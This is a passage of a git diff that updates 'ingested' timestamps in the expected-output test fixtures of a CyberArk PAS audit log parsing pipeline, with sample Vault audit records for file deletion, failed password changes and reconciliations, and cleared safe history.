System-WinDomain-67.43.156.14-PSMConnect\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"PSMConnect\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.14\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "52", "kind": "event" } @@ -491,7 +480,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-06-09T10:24:35.820759300Z", + "ingested": "2021-12-09T13:37:06.873565700Z", "original": "\u003c5\u003e1 2021-03-11T21:06:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 13:06:50\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T21:06:50Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSM-ASR-CYBERARK-WI\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMConnect\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.128.0.65\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"ASR-CYBERARK-WI\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 13:06:50\",\"IsoTimestamp\":\"2021-03-11T21:06:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMConnect\"},{\"Name\":\"Address\",\"Value\":\"10.128.0.65\"},{\"Name\":\"LogonDomain\",\"Value\":\"ASR-CYBERARK-WI\"}]}}}}", "code": "52", "kind": "event" @@ -565,7 +554,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-06-09T10:24:35.820761900Z", + "ingested": "2021-12-09T13:37:06.873570100Z", "original": "\u003c5\u003e1 2021-03-14T12:10:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:10:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:10:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMAdmin\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMAdminConnect\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"169.254.180.25\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"VAGRANT-2012-R2\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:10:17\",\"IsoTimestamp\":\"2021-03-14T12:10:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMAdmin\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMAdminConnect\"},{\"Name\":\"Address\",\"Value\":\"169.254.180.25\"},{\"Name\":\"LogonDomain\",\"Value\":\"VAGRANT-2012-R2\"}]}}}}", "code": "52", "kind": "event" @@ -643,7 +632,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-06-09T10:24:35.820763400Z", + "ingested": "2021-12-09T13:37:06.873574800Z", "original": "\u003c5\u003e1 2021-03-15T15:09:00Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 08:09:00\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T15:09:00Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-10.128.0.7-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.128.0.7\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 08:09:00\",\"IsoTimestamp\":\"2021-03-15T15:09:00Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-Oracle-10.128.0.7-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"10.128.0.7\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "52", "kind": "event" @@ -721,7 +710,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-06-09T10:24:35.820764900Z", + "ingested": "2021-12-09T13:37:06.873578900Z", "original": "\u003c5\u003e1 2021-03-15T15:13:59Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 08:13:59\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T15:13:59Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.128.0.7-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.128.0.7\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 08:13:59\",\"IsoTimestamp\":\"2021-03-15T15:13:59Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.128.0.7-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"10.128.0.7\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "52", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-57-cpm-change-password-failed.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-57-cpm-change-password-failed.log-expected.json index 22d48be208d..86bc4413574 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-57-cpm-change-password-failed.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-57-cpm-change-password-failed.log-expected.json @@ -92,7 +92,7 @@ "event": { "severity": 7, "reason": "Execution error. EXT01::A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. Error code:9002", - "ingested": "2021-06-09T10:24:36.068992600Z", + "ingested": "2021-12-09T13:37:07.987594400Z", "original": "\u003c7\u003e1 2021-03-25T12:00:08Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 08:00:08\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T12:00:08Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e57\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Change Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Change Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux Accounts\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-rhel7.cybr.com-firecall2\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: Execution error. EXT01::A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. Error code:9002\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=rhel7.cybr.com;username=firecall2;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Change Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"firecall2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"rhel7.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Name\\\" Value=\\\"Operating System-UnixSSH-rhel7.cybr.com-root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Folder\\\" Value=\\\"Root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Safe\\\" Value=\\\"Linux Root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1616673608\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580255\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Execution error. EXT01::A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. Error code:9002\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011989\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessReconciliation\\\" Value=\\\"1576120341\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"No\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 08:00:08\",\"IsoTimestamp\":\"2021-03-25T12:00:08Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"57\",\"Desc\":\"CPM Change Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Change Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux Accounts\",\"File\":\"Root\\\\Operating System-UnixSSH-rhel7.cybr.com-firecall2\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: Execution error. EXT01::A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. Error code:9002\",\"ExtraDetails\":\"address=rhel7.cybr.com;username=firecall2;\",\"Message\":\"CPM Change Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"firecall2\"},{\"Name\":\"Address\",\"Value\":\"rhel7.cybr.com\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"ExtraPass3Name\",\"Value\":\"Operating System-UnixSSH-rhel7.cybr.com-root\"},{\"Name\":\"ExtraPass3Folder\",\"Value\":\"Root\"},{\"Name\":\"ExtraPass3Safe\",\"Value\":\"Linux Root\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1616673608\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580255\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Execution error. EXT01::A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. Error code:9002\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011989\"},{\"Name\":\"LastSuccessReconciliation\",\"Value\":\"1576120341\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"No\"},{\"Name\":\"Tags\",\"Value\":\"SSH\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "57", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-59-clear-safe-history.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-59-clear-safe-history.log-expected.json index 277f0341138..b67bb987722 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-59-clear-safe-history.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-59-clear-safe-history.log-expected.json @@ -48,7 +48,7 @@ "event": { "severity": 2, "action": "clear safe history", - "ingested": "2021-06-09T10:24:36.123418600Z", + "ingested": "2021-12-09T13:37:08.157345200Z", "original": "\u003c5\u003e1 2021-03-04T19:25:02Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:25:02\",\"IsoTimestamp\":\"2021-03-04T19:25:02Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"59\",\"Desc\":\"Clear Safe History\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Clear Safe History\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManager_workspace\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Clear Safe History\",\"GatewayStation\":\"\"}}}", "code": "59", "kind": "event" @@ -92,7 +92,7 @@ "event": { "severity": 2, "action": "clear safe history", - "ingested": "2021-06-09T10:24:36.123427700Z", + "ingested": "2021-12-09T13:37:08.157354300Z", "original": "Mar 08 03:10:31 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"59\",\"Desc\":\"Clear Safe History\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Clear Safe History\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManager_workspace\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Clear Safe History\",\"GatewayStation\":\"\"}}}", "code": "59", "kind": "event" @@ -149,7 +149,7 @@ "event": { "severity": 2, "action": "clear safe history", - "ingested": "2021-06-09T10:24:36.123429600Z", + "ingested": "2021-12-09T13:37:08.157360200Z", "original": "\u003c5\u003e1 2021-03-09T09:00:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 01:00:47\",\"IsoTimestamp\":\"2021-03-09T09:00:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"59\",\"Desc\":\"Clear Safe History\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Clear Safe History\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"System\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Clear Safe History\",\"GatewayStation\":\"\"}}}", "code": "59", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log index 2a5483207bf..f526f3989a1 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log @@ -1,9 +1,9 @@ -<7>1 2021-03-11T21:12:22Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:12:22\n 2021-03-11T21:12:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:12:22","IsoTimestamp":"2021-03-11T21:12:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;username=ELASTIC\\bart;","Message":"CPM Reconcile Password 